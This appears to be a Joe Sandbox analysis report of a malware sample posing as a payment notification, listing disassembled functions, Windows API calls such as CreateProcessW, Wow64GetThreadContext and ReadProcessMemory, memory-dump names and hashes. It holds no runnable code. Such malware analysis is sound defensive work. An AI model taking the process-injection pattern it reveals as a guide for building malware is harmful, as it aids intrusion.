Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: e4dd555195d9c1f26020bbc3290ffe8c85d736e639676eac66dba794ac1c3d06
Instruction ID: c61095e1f941689c17b88a57f89cee6c73fa215e62b3fcab92ff2c2afcc47ff3
Opcode Fuzzy Hash: e4dd555195d9c1f26020bbc3290ffe8c85d736e639676eac66dba794ac1c3d06
Instruction Fuzzy Hash: 30C28675A00205CFCB24DF98C880BAEB7B5BF49700F248569E956AB3A1D375ED42CF91

Function 00933923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009733A2

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00933A04

Strings

Line: , xrefs: 009733EB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 3266268788bf7f4723764054528ffeae5d515e57d49febe4fe684c3cbc4b269c
Instruction ID: 469bc914e6a03540bcd8af6e7697d18579bbfe64134e439787a9cdf763ae602b
Opcode Fuzzy Hash: 3266268788bf7f4723764054528ffeae5d515e57d49febe4fe684c3cbc4b269c
Instruction Fuzzy Hash: F331D271448304EAD325EB60DC45BEBB7ECAB80714F00C92EF59983191EB749A4ACBC3

Function 0094FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00950668

Part of subcall function 009532A4: RaiseException.KERNEL32(?,?,?,0095068A,?,00A01444,?,?,?,?,?,?,0095068A,00931129,009F8738,00931129), ref: 00953304

__CxxThrowException@8.LIBVCRUNTIME ref: 00950685

Strings

Unknown exception, xrefs: 00950692

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: b1aa7b6035881cd0958c47f4984aa3fc4ba8034a6f8c56becd71c78f8c38c095
Instruction ID: f90d8feec442bd4d9e1c6da36fbc9708e355f9d1dca4f9cea85151d4de00c399
Opcode Fuzzy Hash: b1aa7b6035881cd0958c47f4984aa3fc4ba8034a6f8c56becd71c78f8c38c095
Instruction Fuzzy Hash: E1F0FF2090020E638B00FAA6D85AE9E776C5EC0341B604530BD24828D1EF71DA6EC780

Function 009B7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009B82F5
TerminateProcess.KERNEL32(00000000), ref: 009B82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 009B84DD

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: b1dc1f9c24ae36d20faf68349c9839e3ff2122c6aa4536f8874432eb46942a04
Instruction ID: 62e23159772905ce377720052d0f22241bd8675e2d78268b745da00a255e611a
Opcode Fuzzy Hash: b1dc1f9c24ae36d20faf68349c9839e3ff2122c6aa4536f8874432eb46942a04
Instruction Fuzzy Hash: E9126C71A083419FC714DF28C584B6ABBE9BF89324F04895DF8998B252DB31ED45CF92

Function 009310F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00931BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00931BF4
Part of subcall function 00931BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00931BFC
Part of subcall function 00931BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00931C07
Part of subcall function 00931BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00931C12
Part of subcall function 00931BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00931C1A
Part of subcall function 00931BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00931C22

Part of subcall function 00931B4A: RegisterWindowMessageW.USER32(00000004,?,009312C4), ref: 00931BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0093136A
OleInitialize.OLE32 ref: 00931388
CloseHandle.KERNEL32(00000000,00000000), ref: 009724AB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 8f8f5c6169a4f4d5dc50ff47773cdbe6ad1482bc05ac05ad5eeba4b7141d6fda
Instruction ID: eef676b387e8d7fbc253db0a7e676eadfc83250a18693a6ddf26456d9b40b8ec
Opcode Fuzzy Hash: 8f8f5c6169a4f4d5dc50ff47773cdbe6ad1482bc05ac05ad5eeba4b7141d6fda
Instruction Fuzzy Hash: 597198B4D113088FC384EFB9AD95AD53AE4FB88344B54822EE04ADB2B1EB316547CF55

Function 009686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,009685CC,?,009F8CC8,0000000C), ref: 00968704
GetLastError.KERNEL32(?,009685CC,?,009F8CC8,0000000C), ref: 0096870E
__dosmaperr.LIBCMT ref: 00968739

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: faa7fdf68b5a132febad16b44e7d4debe2fe7fa8b4edc772938a657ca1ce44fd
Instruction ID: 4ae727452f5b080d6018cec4d04f19efaaab25e4d50767261779225b7fae5a58
Opcode Fuzzy Hash: faa7fdf68b5a132febad16b44e7d4debe2fe7fa8b4edc772938a657ca1ce44fd
Instruction Fuzzy Hash: DA016D33A0566066D634A334E849F7F6B4D4BC2B74F3A0319F9188B2D2DEB1CC829290

Function 00941310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009417F6

Strings

CALL, xrefs: 009417C6

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: c30fd81efc7886c2613dd52942f428d0c4094e22db0e6a3ccfd0eed8c8595c58
Instruction ID: 101623d3650860205336a728897fa1753b423e47a38b73eb74bcfcd6924ae57f
Opcode Fuzzy Hash: c30fd81efc7886c2613dd52942f428d0c4094e22db0e6a3ccfd0eed8c8595c58
Instruction Fuzzy Hash: 9B2268706083019FC714DF24C894F2ABBE5BF89314F24895DF49A8B3A2D775E985CB92

Function 00932DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00972C8C

Part of subcall function 00933AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00933A97,?,?,00932E7F,?,?,?,00000000), ref: 00933AC2

Part of subcall function 00932DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00932DC4

Strings

X, xrefs: 00972C5A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: e54a4ce3483eebe4335bfaa01f0a7076c1188896ba2c0fb81f71f6142fedf9bc
Instruction ID: 11f1ca14f8e54ba2c1804bf3cc0b2faa1ec52731ed24a8035927ebb655eeb2a5
Opcode Fuzzy Hash: e54a4ce3483eebe4335bfaa01f0a7076c1188896ba2c0fb81f71f6142fedf9bc
Instruction Fuzzy Hash: 2821A571A1025C9FCF11EF94C849BEE7BFCAF89704F008059E549B7241DBB85A498FA1

Function 00933837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00933908

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: fefe086d22bcc7950ff3bcfa2cc06b35a4f7b9cffd9d572b24d9dc11522d7d20
Instruction ID: fcf80e39b46c6ed221e8cace106d415c08c1c2f75d8e8e6b944987487bf31128
Opcode Fuzzy Hash: fefe086d22bcc7950ff3bcfa2cc06b35a4f7b9cffd9d572b24d9dc11522d7d20
Instruction Fuzzy Hash: A9318EB0904301DFD760DF64D884B97BBE8FB49709F00492EF59987290E771AA45CB92

Function 00935745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0093949C,?,00008000), ref: 00935773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0093949C,?,00008000), ref: 00974052

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7718b99d5b0961c3aae6eed909ec52e921d58d10d19321541300c3a90689e27b
Instruction ID: e21ebd68316bb96347897047985e1fcf10121fe2e8dd5fe5eee621f65c132009
Opcode Fuzzy Hash: 7718b99d5b0961c3aae6eed909ec52e921d58d10d19321541300c3a90689e27b
Instruction Fuzzy Hash: 8B019E31245225B6E3310A2ACC0EFA77F98EF067B0F15C300FAAD6A1E1CBB45854CB90

Function 0093B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0093BB4E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: eb525059cf90a774683556099a34bc7bc87c30e57f800358afbf4b2eab8b69cc
Instruction ID: 89d2b28b2f6b648bbc749d740bd7dd1c464062120d72e69b07a5ab8491b41b9b
Opcode Fuzzy Hash: eb525059cf90a774683556099a34bc7bc87c30e57f800358afbf4b2eab8b69cc
Instruction Fuzzy Hash: 7D32AD35A00209DFDB24DF54C898BBEB7B9EF84314F14805AEA15AB391C778AD46CF91

Function 01314BED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 013153AB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01315441
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01315463

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
Instruction ID: 44ec1a34b0afcbd349712d518a46e14c559557f8f5fb157fa6aae4fce1ce6864
Opcode Fuzzy Hash: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
Instruction Fuzzy Hash: 6B12BE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 009B709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 45a744c8b0860e4b02def9c2ba310a2939d7ef293954e5ec41122d0344736d39
Instruction ID: f0f8d6ac7b18fcdb0f1431080ea53f742e00020442a17e7b8e50e7e33a7a95c5
Opcode Fuzzy Hash: 45a744c8b0860e4b02def9c2ba310a2939d7ef293954e5ec41122d0344736d39
Instruction Fuzzy Hash: 25D12975A04209EFCB14DF98D981AEDFBB5FF88324F144159E915AB291D730AD81CF90

Function 0094FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0094FD1F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 1a29925ca2ace376f0977e204552e26271a1c52d5bae0e86343f2000dc8b53ae
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5D31D575A0010ADBC718CF59D4E0D69F7A5FF49301B2486A5E849CB696D731EDC1CBD0

Function 00934ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00934E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00934EDD,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934E9C
Part of subcall function 00934E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00934EAE
Part of subcall function 00934E90: FreeLibrary.KERNEL32(00000000,?,?,00934EDD,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934EFD

Part of subcall function 00934E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00973CDE,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934E62
Part of subcall function 00934E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00934E74
Part of subcall function 00934E59: FreeLibrary.KERNEL32(00000000,?,?,00973CDE,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934E87

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 7137bdaef0dec3a059252842f71625feab7e7e937d24008e287e50ff7390c61b
Instruction ID: 3997cdd69cac1729e7db7dfe3d7c3a6404ff31cd22f97d62af66aaba2352a8fb
Opcode Fuzzy Hash: 7137bdaef0dec3a059252842f71625feab7e7e937d24008e287e50ff7390c61b
Instruction Fuzzy Hash: 8D112332600205AACF24EB64DC02FAD77A5AF80B10F15842DF446A61C1EE74EE05AF50

Function 00968402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00968440

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 067e6f725f5eb6d5fadf9fcd0da3c11812ae09092af84a7c08cc8e77a311296f
Instruction ID: 395de02f56d6b4f860f8db759edda963c4aef87dd5f93870da399ea5dd918b60
Opcode Fuzzy Hash: 067e6f725f5eb6d5fadf9fcd0da3c11812ae09092af84a7c08cc8e77a311296f
Instruction Fuzzy Hash: 7011187590410AAFCB05DF58E941A9B7BF9EF49314F114199F808AB312DA31DA11CBA5

Function 00965000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00964C7D: RtlAllocateHeap.NTDLL(00000008,00931129,00000000,?,00962E29,00000001,00000364,?,?,?,0095F2DE,00963863,00A01444,?,0094FDF5,?), ref: 00964CBE

_free.LIBCMT ref: 0096506C

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: c8576dc8c032208d0064debafd0d5ba52f616d5a390ea7c6be0b8cab0278578c
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 7E0126722047056BE3218F65D881A9AFBECFBC9370F26051DE18893280EA30A805C6B4

Function 0095E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 92e012a2dcd6a50b176792bf70109100d78ca02c84521e8075b080f28d5acdb2
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 20F04432502A109AC735BB6B9C05B5B338D8FD23B3F100B15FC20921C2CB75E90A87A5

Function 00939CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00939CBD

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
Instruction ID: 6c3e38a02913d734a4c0ea0d6e200cea51941b2fe60a5a36a6b03a03438feb4f
Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
